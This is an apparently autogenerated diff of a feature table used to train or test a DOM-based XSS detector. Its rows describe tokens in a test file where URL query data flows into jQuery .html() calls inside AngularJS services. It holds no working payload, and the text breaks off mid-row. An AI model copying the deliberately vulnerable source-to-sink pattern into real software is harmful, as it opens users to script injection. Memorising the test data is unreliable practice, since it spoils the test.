    " | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16599,6 +115300,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:151:35:151:41 | "
    " | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:151:35:151:41 | "
    " | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:151:35:151:41 | "
    " | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:44:151:47 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:44:151:47 | html | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:151:44:151:47 | html | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:44:151:47 | html | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:44:151:47 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:151:49:151:49 | v | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:151:49:151:49 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:151:49:151:49 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16606,6 +115312,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:151:49:151:49 | v | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:151:49:151:49 | v | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:151:49:151:49 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:154:10:154:16 | factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:10:154:16 | factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:154:10:154:16 | factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:10:154:16 | factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:154:10:154:16 | factory | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:154:18:154:41 | "xssSou ... ervice" | CalleeFlexibleAccessPath | angular.module().factory().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:154:18:154:41 | "xssSou ... ervice" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:154:18:154:41 | "xssSou ... ervice" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16621,15 +115332,85 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:154:44:156:10 | ["xssSo ... }] | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:154:44:156:10 | ["xssSo ... }] | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:154:45:154:62 | "xssSourceService" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:154:64 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:154:64 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:154:64 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:154:64 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:154:64 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | contextSurroundingFunctionParameters | ()\n(xssSourceService) | | autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:154:65:156:9 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | contextSurroundingFunctionParameters | ()\n(xssSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:154:74:154:89 | xssSourceService | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:13 | $ | contextSurroundingFunctionParameters | ()\n(xssSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:13 | $ | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:13 | $ | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | $("
    ") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | $("
    ") | contextSurroundingFunctionParameters | ()\n(xssSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | $("
    ") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | $("
    ") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | $("
    ") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | exceptional return of $("
    ") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | exceptional return of $("
    ") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | exceptional return of $("
    ") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | exceptional return of $("
    ") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:22 | exceptional return of $("
    ") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:27 | $("
